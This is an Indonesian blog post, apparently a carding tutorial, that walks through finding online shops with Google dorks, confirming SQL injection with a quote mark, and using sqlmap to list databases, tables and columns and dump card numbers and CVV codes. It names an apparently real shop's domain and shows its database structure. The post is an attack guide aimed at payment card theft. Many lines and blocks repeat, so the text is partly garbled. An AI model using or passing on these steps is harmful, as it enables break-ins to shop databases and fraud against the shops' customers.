Ok Langsung Aja Ke Tkp
1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :
Pertama ,ambil dork lalu scan menggunakan sqli scanner :
Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="
http://www.zite.com/merchandise/index.php?cat=268
menjadi :
http://www.zite.com/merchandise/index.php?cat='268
menjadi :
http://www.zite.com/merchandise/index.php?cat='268
Nah, web tersebut error saat kita inject ,
Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs
Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs
Disini kita mendapatkan 3 database :
[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )
nah, saya dapat tables nya :
Table: orders
[18 columns]
+-----------------+-------------+
| Column | Type |
+-----------------+-------------+
| cart_id | varchar(15) |
| cc_ex_month | tinyint(4) |
| cc_ex_year | int(11) |
| cc_number | varchar(30) |
| cc_type | varchar(20) |
| customer_id | int(11) |
| cvv2 | varchar(20) |
| date | datetime |
| id | int(11) |
| ipaddress | varchar(25) |
| payment_method | varchar(15) |
| shipping | float(8,2) |
| shipping_method | varchar(5) |
| status | tinyint(4) |
| subtotal | float(8,2) |
| tax | float(8,2) |
| text | text |
| total | float(8,2) |
+-----------------+-------------+
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )
nah, saya dapat tables nya :
Database: balboast_gkgcart
[88 tables]
+-----------------------+
| amanu |
| categories |
| clients |
| components |
| config |
| config_groups |
| customers |
| form_data |
| form_fields |
| forms |
| geo |
| groups |
| item_amanu |
| item_cat |
| item_files |
| item_files_customer |
| item_options |
| item_options_linked |
| item_options_values |
| item_related |
| item_thread |
| item_thread_old |
| items |
| items_addphoto |
| items_item_files |
| items_packages |
| languages |
| logs |
| mailinglist |
| mailinglist_cat |
| mailinglist_members |
| manu |
| news |
| news_cat |
| news_news_cat |
| orders |
| photos |
| photos_cat |
| pic_gallery |
| ship_prices |
| ship_zones |
| sites |
| sites_components |
| thread |
| thread_gel |
| thread_items |
| ups |
| ups_packaging |
| ups_pickup |
| ups_service |
| ups_units |
| users |
| users_access |
| users_groups |
| users_spu |
| users_spu_values |
| zones |
+-----------------------+
[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'
Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns
Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns
Maka akan muncul seperti ini :
Table: orders
[18 columns]
+-----------------+-------------+
| Column | Type |
+-----------------+-------------+
| cart_id | varchar(15) |
| cc_ex_month | tinyint(4) |
| cc_ex_year | int(11) |
| cc_number | varchar(30) |
| cc_type | varchar(20) |
| customer_id | int(11) |
| cvv2 | varchar(20) |
| date | datetime |
| id | int(11) |
| ipaddress | varchar(25) |
| payment_method | varchar(15) |
| shipping | float(8,2) |
| shipping_method | varchar(5) |
| status | tinyint(4) |
| subtotal | float(8,2) |
| tax | float(8,2) |
| text | text |
| total | float(8,2) |
+-----------------+-------------+
Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump
contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .
Jika kurang jelas bisa download video nya disini
Semoga bermanfaat :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump
contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .
Jika kurang jelas bisa download video nya disini
Semoga bermanfaat :)
1 komentar:
keren blog nya tp sayang buat logo aja masih ambil logo orang lain :P
Posting Komentar